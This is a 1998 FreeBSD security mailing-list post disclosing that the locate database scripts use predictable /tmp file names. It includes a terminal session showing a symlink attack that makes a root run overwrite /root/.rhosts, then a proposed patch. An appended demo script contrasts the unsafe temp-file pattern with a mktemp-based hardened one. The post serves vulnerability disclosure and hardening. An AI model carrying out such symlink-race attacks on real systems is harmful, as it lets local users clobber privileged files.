Date:      Thu, 23 Apr 1998 16:09:46 +1000 (EST)
From:      Nicholas Charles Brawn <ncb05@uow.edu.au>
To:        freebsd-security@FreeBSD.ORG
Subject:   Symlinks again...
Message-ID:  <Pine.SOL.3.96.980423160425.8809A-100000@banshee.cs.uow.edu.au>

Another symlink problem.

The scripts /usr/libexec/locate.updatedb and /usr/libexec/locate.mklocatedb
create predictable filenames in /tmp. An example attack is shown below.

nbrawn@devel:~$ uname -a
FreeBSD devel 2.2.6-RELEASE FreeBSD 2.2.6-RELEASE #0: Sun Apr 19 18:51:09 EST 1998     root@devel:/usr/src/sys/compile/devel  i386
nbrawn@devel:~$ ls /tmp
total 2
drwxrwxrwt   2 bin   bin    512 Apr 23 15:28 ./
drwxr-xr-x  18 root  wheel  512 Apr 23 15:14 ../
nbrawn@devel:~$ /usr/libexec/locate.updatedb

[1]+  Stopped                 /usr/libexec/locate.updatedb
nbrawn@devel:~$ ls /tmp
total 2
drwxrwxrwt   2 bin     bin    512 Apr 23 15:28 ./
drwxr-xr-x  18 root    wheel  512 Apr 23 15:14 ../
-rw-------   1 nbrawn  bin      0 Apr 23 15:28 _mklocatedb575.list
-rw-r--r--   1 nbrawn  bin      0 Apr 23 15:28 _updatedb571
nbrawn@devel:~$ fg
/usr/libexec/locate.updatedb
locate.mklocatedb: cannot build locate database
nbrawn@devel:~$ ps
  PID  TT  STAT      TIME COMMAND
  172  v2  Is     0:00.37 -bash (bash)
  173  v3  Ss     0:00.96 -bash (bash)
  584  v3  R+     0:00.00 ps
nbrawn@devel:~$ ln -s /root/.rhosts /tmp/_mklocatedb591.list
nbrawn@devel:~$ su
Password:
su-2.01# /usr/libexec/locate.updatedb 

[1]+  Stopped                 /usr/libexec/locate.updatedb
su-2.01# ls /tmp
total 2
drwxrwxrwt   2 bin     bin    512 Apr 23 15:29 ./
drwxr-xr-x  18 root    wheel  512 Apr 23 15:14 ../
lrwxrwxrwx   1 nbrawn  bin     13 Apr 23 15:29 _mklocatedb591.list@ -> /root/.rhosts
-rw-r--r--   1 root    bin      0 Apr 23 15:29 _updatedb587
su-2.01# fg
/usr/libexec/locate.updatedb
su-2.01# ls /root/.rhosts
-rw-------  1 root  wheel  439009 Apr 23 15:30 /root/.rhosts
su-2.01# exit
exit
nbrawn@devel:~$

The problem appears easily fixed by editing the problem scripts and adding a
few lines:

#!/bin/sh
#
# Copyright (c) September 1995 Wolfram Schneider <wosch@FreeBSD.org>. Berlin.
# All rights reserved.

[snip]

# mklocatedb - build locate database
# 
# usage: mklocatedb [-presort] < filelist > database
#
# $Id: mklocatedb.sh,v 1.2.2.1 1997/12/13 18:21:02 sef Exp $

[snip]

umask 077			# protect temp files

export ROOTDIR=/var/run
TMPDIR=${TMPDIR:-/tmp}; export TMPDIR
if test X"$TMPDIR" = X -o ! -d "$TMPDIR"; then
	TMPDIR=/tmp; export TMPDIR
fi

[snip]

if [ "$USER" != "root" ] 	# won't work if su'ing, someone think of a
then				# better check :)
	bigrams=$TMPDIR/_mklocatedb$$.bigrams
	filelist=$TMPDIR/_mklocatedb$$.list
else
	bigrams=$ROOTDIR/_mklocatedb$$.bigrams
	filelist=$ROOTDIR/_mklocatedb$$.list
fi

How many other programs/scripts in FreeBSD -stable and -current are
using /tmp that should be using /var/run?

Nicholas Brawn

ps, sorry for the long post :)
--
Email: ncb05@uow.edu.au
Nicholas Brawn - Computer Science Undergraduate, University of Wollongong.
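
Added example, not part of the original post or of the FreeBSD scripts: the PID-based temp file name from the message beside a hardened form that does not depend on who runs the script. The function names (unsafe_list, safe_list, demo) and the scratch paths are hypothetical, and a mktemp(1) that supports -d is assumed.

```shell
#!/bin/sh
# Added example; every path lives under a scratch directory created below.
# "victim" stands in for a file such as /root/.rhosts.

# Weak pattern: name built from a guessable number, opened with plain ">".
unsafe_list() {                       # $1 = temp dir, $2 = PID-like suffix
    f="$1/_mklocatedb$2.list"
    echo "file list data" > "$f"      # follows a symlink planted at $f
    echo "$f"
}

# Hardened pattern: mktemp -d picks an unpredictable name and creates the
# directory atomically with mode 0700, so nobody else can plant links in it.
safe_list() {                         # $1 = temp dir
    d=$(mktemp -d "$1/_mklocatedb.XXXXXXXX") || return 1
    f="$d/list"
    # noclobber (set -C) makes ">" fail if the name already exists.
    ( umask 077; set -C; echo "file list data" > "$f" ) || return 1
    echo "$f"
}

demo() {
    scratch=$(mktemp -d "${TMPDIR:-/tmp}/symlink-demo.XXXXXXXX") || return 1
    mkdir "$scratch/tmp" "$scratch/root"
    victim="$scratch/root/victim"
    # Constructed scenario: the link is in place before the script runs.
    ln -s "$victim" "$scratch/tmp/_mklocatedb591.list"

    echo "original" > "$victim"
    unsafe_list "$scratch/tmp" 591 > /dev/null
    [ "$(cat "$victim")" = "original" ] && u=intact || u=clobbered

    echo "original" > "$victim"
    new=$(safe_list "$scratch/tmp") || new=""
    [ "$(cat "$victim")" = "original" ] && [ -f "$new" ] && [ ! -L "$new" ] \
        && s=intact || s=clobbered

    rm -rf "$scratch"
    echo "unsafe=$u safe=$s"
}

demo    # prints: unsafe=clobbered safe=intact
```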

